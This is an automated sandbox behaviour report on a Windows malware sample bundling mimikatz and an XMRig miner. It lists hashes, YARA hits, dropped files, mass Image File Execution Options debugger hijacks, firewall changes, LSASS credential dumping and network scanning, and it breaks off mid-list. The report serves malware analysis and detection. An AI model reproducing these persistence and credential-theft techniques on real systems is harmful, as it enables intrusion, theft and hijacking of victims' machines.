Analysis
-
max time kernel
150s -
max time network
156s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
16-11-2024 11:13
Behavioral task
behavioral1
Sample
2024-11-16_f92ab9f95fc7af060e030eba3740eb5a_hacktools_icedid_mimikatz.exe
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
2024-11-16_f92ab9f95fc7af060e030eba3740eb5a_hacktools_icedid_mimikatz.exe
Resource
win10v2004-20241007-en
General
-
Target
2024-11-16_f92ab9f95fc7af060e030eba3740eb5a_hacktools_icedid_mimikatz.exe
-
Size
17.5MB
-
MD5
f92ab9f95fc7af060e030eba3740eb5a
-
SHA1
91c0ec0bb6ad3a3f1b2ad772c40b260b1cf7ccfd
-
SHA256
e5f7b32c9a7280103d6cbf3c2d3b43ecb761ccb9021b6975fef5945f8275b8bf
-
SHA512
5561587b2ce00ff2271fd23e3c2fc64d2492db5dd3f38e778ccc9d24fcac89c1c0500000cdc7a3a106354e67b06236aef41ca3ff5f4738408f0862843ac28d8b
-
SSDEEP
196608:ylTPemknGzwHdOgEPHd9BYX/nivPlTXTYPHlTPemknGzwHdOgEPHd9BYX/nivPl/:a3jz0E52/iv1E3jz0E52/iv1
Malware Config
Signatures
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Mimikatz family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 4592 created 2092 4592 yittybr.exe 37 -
Xmrig family
-
Contacts a large (19477) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
OS Credential Dumping: LSASS Memory 1 TTPs
Malicious access to Credentials History.
-
XMRig Miner payload 10 IoCs
resource yara_rule behavioral2/memory/4500-178-0x00007FF72CA70000-0x00007FF72CB90000-memory.dmp xmrig behavioral2/memory/4500-183-0x00007FF72CA70000-0x00007FF72CB90000-memory.dmp xmrig behavioral2/memory/4500-204-0x00007FF72CA70000-0x00007FF72CB90000-memory.dmp xmrig behavioral2/memory/4500-217-0x00007FF72CA70000-0x00007FF72CB90000-memory.dmp xmrig behavioral2/memory/4500-226-0x00007FF72CA70000-0x00007FF72CB90000-memory.dmp xmrig behavioral2/memory/4500-235-0x00007FF72CA70000-0x00007FF72CB90000-memory.dmp xmrig behavioral2/memory/4500-250-0x00007FF72CA70000-0x00007FF72CB90000-memory.dmp xmrig behavioral2/memory/4500-499-0x00007FF72CA70000-0x00007FF72CB90000-memory.dmp xmrig behavioral2/memory/4500-501-0x00007FF72CA70000-0x00007FF72CB90000-memory.dmp xmrig behavioral2/memory/4500-503-0x00007FF72CA70000-0x00007FF72CB90000-memory.dmp xmrig -
mimikatz is an open source tool to dump credentials on Windows 5 IoCs
resource yara_rule behavioral2/memory/740-0-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/memory/740-4-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/files/0x000a000000023b9d-6.dat mimikatz behavioral2/memory/2284-8-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/memory/2792-138-0x00007FF620870000-0x00007FF62095E000-memory.dmp mimikatz -
Drops file in Drivers directory 2 IoCs
description ioc Process File opened for modification C:\Windows\system32\drivers\etc\hosts yittybr.exe File created C:\Windows\system32\drivers\npf.sys wpcap.exe -
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" yittybr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" yittybr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe yittybr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe yittybr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" yittybr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" yittybr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" yittybr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" yittybr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe yittybr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe yittybr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe yittybr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" yittybr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" yittybr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" yittybr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe yittybr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe yittybr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" yittybr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe yittybr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" yittybr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe yittybr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" yittybr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" yittybr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe yittybr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" yittybr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe yittybr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe yittybr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe yittybr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" yittybr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe yittybr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" yittybr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" yittybr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe yittybr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe yittybr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" yittybr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" yittybr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe yittybr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" yittybr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe yittybr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe yittybr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe yittybr.exe -
Modifies Windows Firewall 2 TTPs 2 IoCs
pid Process 872 netsh.exe 2000 netsh.exe -
Executes dropped EXE 29 IoCs
pid Process 2284 yittybr.exe 4592 yittybr.exe 2180 wpcap.exe 1816 bjfisnrbq.exe 2792 vfshost.exe 1432 btjlhtrlh.exe 3852 xohudmc.exe 180 luprqy.exe 4500 ttlnnh.exe 2492 btjlhtrlh.exe 2984 btjlhtrlh.exe 2108 btjlhtrlh.exe 1836 btjlhtrlh.exe 3616 btjlhtrlh.exe 3904 yittybr.exe 540 btjlhtrlh.exe 4316 btjlhtrlh.exe 2680 btjlhtrlh.exe 816 btjlhtrlh.exe 2792 btjlhtrlh.exe 4320 btjlhtrlh.exe 4008 btjlhtrlh.exe 3280 btjlhtrlh.exe 2848 btjlhtrlh.exe 4492 btjlhtrlh.exe 1004 btjlhtrlh.exe 4824 btjlhtrlh.exe 4276 vmlbqggye.exe 4472 yittybr.exe -
Loads dropped DLL 12 IoCs
pid Process 2180 wpcap.exe 2180 wpcap.exe 2180 wpcap.exe 2180 wpcap.exe 2180 wpcap.exe 2180 wpcap.exe 2180 wpcap.exe 2180 wpcap.exe 2180 wpcap.exe 1816 bjfisnrbq.exe 1816 bjfisnrbq.exe 1816 bjfisnrbq.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 68 ifconfig.me 69 ifconfig.me -
Creates a Windows Service
-
Drops file in System32 directory 18 IoCs
description ioc Process File created C:\Windows\system32\Packet.dll wpcap.exe File created C:\Windows\SysWOW64\luprqy.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content yittybr.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 yittybr.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\088D7AA6D7DCA369223412E8DEF831B8 yittybr.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 yittybr.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache yittybr.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies yittybr.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft yittybr.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 yittybr.exe File created C:\Windows\SysWOW64\pthreadVC.dll wpcap.exe File created C:\Windows\SysWOW64\wpcap.dll wpcap.exe File created C:\Windows\SysWOW64\Packet.dll wpcap.exe File created C:\Windows\system32\wpcap.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\luprqy.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE yittybr.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData yittybr.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\088D7AA6D7DCA369223412E8DEF831B8 yittybr.exe -
resource yara_rule behavioral2/files/0x0007000000023c88-134.dat upx behavioral2/memory/2792-135-0x00007FF620870000-0x00007FF62095E000-memory.dmp upx behavioral2/memory/2792-138-0x00007FF620870000-0x00007FF62095E000-memory.dmp upx behavioral2/files/0x0007000000023c93-141.dat upx behavioral2/memory/1432-142-0x00007FF702680000-0x00007FF7026DB000-memory.dmp upx behavioral2/memory/1432-146-0x00007FF702680000-0x00007FF7026DB000-memory.dmp upx behavioral2/files/0x0007000000023c90-160.dat upx behavioral2/memory/4500-161-0x00007FF72CA70000-0x00007FF72CB90000-memory.dmp upx behavioral2/memory/2492-172-0x00007FF702680000-0x00007FF7026DB000-memory.dmp upx behavioral2/memory/2984-176-0x00007FF702680000-0x00007FF7026DB000-memory.dmp upx behavioral2/memory/4500-178-0x00007FF72CA70000-0x00007FF72CB90000-memory.dmp upx behavioral2/memory/2108-181-0x00007FF702680000-0x00007FF7026DB000-memory.dmp upx behavioral2/memory/4500-183-0x00007FF72CA70000-0x00007FF72CB90000-memory.dmp upx behavioral2/memory/1836-186-0x00007FF702680000-0x00007FF7026DB000-memory.dmp upx behavioral2/memory/3616-190-0x00007FF702680000-0x00007FF7026DB000-memory.dmp upx behavioral2/memory/540-198-0x00007FF702680000-0x00007FF7026DB000-memory.dmp upx behavioral2/memory/4316-202-0x00007FF702680000-0x00007FF7026DB000-memory.dmp upx behavioral2/memory/4500-204-0x00007FF72CA70000-0x00007FF72CB90000-memory.dmp upx behavioral2/memory/2680-207-0x00007FF702680000-0x00007FF7026DB000-memory.dmp upx behavioral2/memory/816-211-0x00007FF702680000-0x00007FF7026DB000-memory.dmp upx behavioral2/memory/2792-215-0x00007FF702680000-0x00007FF7026DB000-memory.dmp upx behavioral2/memory/4500-217-0x00007FF72CA70000-0x00007FF72CB90000-memory.dmp upx behavioral2/memory/4320-220-0x00007FF702680000-0x00007FF7026DB000-memory.dmp upx behavioral2/memory/4008-224-0x00007FF702680000-0x00007FF7026DB000-memory.dmp upx behavioral2/memory/4500-226-0x00007FF72CA70000-0x00007FF72CB90000-memory.dmp upx behavioral2/memory/3280-229-0x00007FF702680000-0x00007FF7026DB000-memory.dmp upx behavioral2/memory/2848-232-0x00007FF702680000-0x00007FF7026DB000-memory.dmp upx behavioral2/memory/4492-234-0x00007FF702680000-0x00007FF7026DB000-memory.dmp upx behavioral2/memory/4500-235-0x00007FF72CA70000-0x00007FF72CB90000-memory.dmp upx behavioral2/memory/1004-237-0x00007FF702680000-0x00007FF7026DB000-memory.dmp upx behavioral2/memory/4824-239-0x00007FF702680000-0x00007FF7026DB000-memory.dmp upx behavioral2/memory/4500-250-0x00007FF72CA70000-0x00007FF72CB90000-memory.dmp upx behavioral2/memory/4500-499-0x00007FF72CA70000-0x00007FF72CB90000-memory.dmp upx behavioral2/memory/4500-501-0x00007FF72CA70000-0x00007FF72CB90000-memory.dmp upx behavioral2/memory/4500-503-0x00007FF72CA70000-0x00007FF72CB90000-memory.dmp upx -
Drops file in Program Files directory 3 IoCs
description ioc Process File created C:\Program Files\WinPcap\LICENSE wpcap.exe File created C:\Program Files\WinPcap\uninstall.exe wpcap.exe File created C:\Program Files\WinPcap\rpcapd.exe wpcap.exe -
Drops file in Windows directory 60 IoCs
description ioc Process File created C:\Windows\ppgkyibiq\UnattendGC\specials\tibe-2.dll yittybr.exe File opened for modification C:\Windows\ppgkyibiq\Corporate\log.txt cmd.exe File created C:\Windows\ppgkyibiq\UnattendGC\specials\zlib1.dll yittybr.exe File created C:\Windows\ppgkyibiq\UnattendGC\svschost.xml yittybr.exe File created C:\Windows\ppgkyibiq\UnattendGC\specials\docmicfg.xml yittybr.exe File opened for modification C:\Windows\tllefmnq\yittybr.exe 2024-11-16_f92ab9f95fc7af060e030eba3740eb5a_hacktools_icedid_mimikatz.exe File created C:\Windows\ppgkyibiq\ihnqsqiep\Packet.dll yittybr.exe File created C:\Windows\ppgkyibiq\UnattendGC\specials\vimpcsvc.xml yittybr.exe File created C:\Windows\tllefmnq\yittybr.exe 2024-11-16_f92ab9f95fc7af060e030eba3740eb5a_hacktools_icedid_mimikatz.exe File created C:\Windows\ppgkyibiq\UnattendGC\specials\vimpcsvc.exe yittybr.exe File opened for modification C:\Windows\tllefmnq\svschost.xml yittybr.exe File created C:\Windows\tllefmnq\docmicfg.xml yittybr.exe File created C:\Windows\ppgkyibiq\ihnqsqiep\ip.txt yittybr.exe File created C:\Windows\ppgkyibiq\ihnqsqiep\wpcap.exe yittybr.exe File created C:\Windows\ppgkyibiq\UnattendGC\specials\libxml2.dll yittybr.exe File created C:\Windows\ppgkyibiq\UnattendGC\docmicfg.xml yittybr.exe File created C:\Windows\ppgkyibiq\UnattendGC\schoedcl.xml yittybr.exe File created C:\Windows\ppgkyibiq\UnattendGC\specials\spoolsrv.xml yittybr.exe File opened for modification C:\Windows\tllefmnq\vimpcsvc.xml yittybr.exe File created C:\Windows\ppgkyibiq\UnattendGC\Shellcode.ini yittybr.exe File created C:\Windows\ppgkyibiq\ihnqsqiep\wpcap.dll yittybr.exe File created C:\Windows\ppgkyibiq\ihnqsqiep\vmlbqggye.exe yittybr.exe File created C:\Windows\ppgkyibiq\UnattendGC\specials\crli-0.dll yittybr.exe File opened for modification C:\Windows\tllefmnq\spoolsrv.xml yittybr.exe File created C:\Windows\ppgkyibiq\UnattendGC\AppCapture64.dll yittybr.exe File created C:\Windows\ppgkyibiq\upbdrjv\swrpwe.exe yittybr.exe File created C:\Windows\ppgkyibiq\UnattendGC\specials\cnli-1.dll yittybr.exe File created C:\Windows\ppgkyibiq\UnattendGC\specials\trfo-2.dll yittybr.exe File created C:\Windows\ppgkyibiq\UnattendGC\specials\docmicfg.exe yittybr.exe File created C:\Windows\tllefmnq\schoedcl.xml yittybr.exe File created C:\Windows\ppgkyibiq\UnattendGC\specials\ucl.dll yittybr.exe File created C:\Windows\ppgkyibiq\UnattendGC\specials\svschost.exe yittybr.exe File created C:\Windows\ppgkyibiq\UnattendGC\spoolsrv.xml yittybr.exe File created C:\Windows\ppgkyibiq\UnattendGC\specials\xdvl-0.dll yittybr.exe File created C:\Windows\ppgkyibiq\UnattendGC\specials\spoolsrv.exe yittybr.exe File created C:\Windows\ppgkyibiq\ihnqsqiep\scan.bat yittybr.exe File created C:\Windows\ppgkyibiq\UnattendGC\specials\coli-0.dll yittybr.exe File created C:\Windows\ppgkyibiq\UnattendGC\specials\exma-1.dll yittybr.exe File created C:\Windows\ppgkyibiq\UnattendGC\specials\trch-1.dll yittybr.exe File created C:\Windows\ppgkyibiq\Corporate\mimidrv.sys yittybr.exe File created C:\Windows\ppgkyibiq\Corporate\mimilib.dll yittybr.exe File created C:\Windows\ppgkyibiq\UnattendGC\specials\libeay32.dll yittybr.exe File created C:\Windows\ppgkyibiq\UnattendGC\specials\schoedcl.exe yittybr.exe File created C:\Windows\tllefmnq\spoolsrv.xml yittybr.exe File created C:\Windows\ime\yittybr.exe yittybr.exe File created C:\Windows\ppgkyibiq\ihnqsqiep\bjfisnrbq.exe yittybr.exe File created C:\Windows\ppgkyibiq\UnattendGC\specials\posh-0.dll yittybr.exe File created C:\Windows\ppgkyibiq\Corporate\vfshost.exe yittybr.exe File opened for modification C:\Windows\tllefmnq\docmicfg.xml yittybr.exe File opened for modification C:\Windows\tllefmnq\schoedcl.xml yittybr.exe File opened for modification C:\Windows\ppgkyibiq\ihnqsqiep\Result.txt vmlbqggye.exe File opened for modification C:\Windows\ppgkyibiq\ihnqsqiep\Packet.dll yittybr.exe File created C:\Windows\tllefmnq\svschost.xml yittybr.exe File created C:\Windows\tllefmnq\vimpcsvc.xml yittybr.exe File created C:\Windows\ppgkyibiq\UnattendGC\specials\tucl-1.dll yittybr.exe File created C:\Windows\ppgkyibiq\UnattendGC\vimpcsvc.xml yittybr.exe File created C:\Windows\ppgkyibiq\UnattendGC\specials\ssleay32.dll yittybr.exe File created C:\Windows\ppgkyibiq\UnattendGC\specials\svschost.xml yittybr.exe File created C:\Windows\ppgkyibiq\UnattendGC\specials\schoedcl.xml yittybr.exe File created C:\Windows\ppgkyibiq\UnattendGC\AppCapture32.dll yittybr.exe -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 4384 sc.exe 3892 sc.exe 3972 sc.exe 4876 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wpcap.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xohudmc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened 